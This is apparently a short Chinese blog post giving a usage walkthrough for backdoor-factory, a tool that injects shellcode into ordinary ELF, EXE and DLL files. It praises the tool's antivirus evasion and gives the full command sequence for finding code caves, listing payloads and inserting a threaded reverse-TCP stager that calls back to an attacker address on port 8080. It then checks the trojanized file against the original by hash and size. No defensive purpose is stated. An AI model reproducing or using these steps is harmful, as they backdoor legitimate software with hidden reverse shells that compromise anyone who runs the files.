title: shellcode注入工具—backdoor-factory
date: 2019-9-19 23:10:29
tags: 工具
backdoor-factory是向正常的elf、exe、dll注入shellcode。之前测试过,免杀效果还可以,但是比较依赖正常的文件
backdoor.py -f /demo/xxx.exe -S //检测是否支持后门植入backdoor.py -f /demo/xxx.exe -c -l 700 //显示出code cave大于700字符大小的code cavebackdoor.py -f /demo/xxx.exe -s show //查看可用payloadbackdoor.py -f /demo/xxx.exe -H x.x.x.x -P 8080 -s iat_reverse_tcp_stager_threaded //插入payload,并生成文件。
生成好之后可以对比一下
md5sum ./guobang.exe /root/demo/guobang.exe //对比原文件与生成文件MD5值
du -b ./guobang.exe /root/demo/guobang.exe //对比文件大小
tips:
1、backdoor最好是github上下载的,不要aptget
若有收获,就点个赞吧
0 人点赞
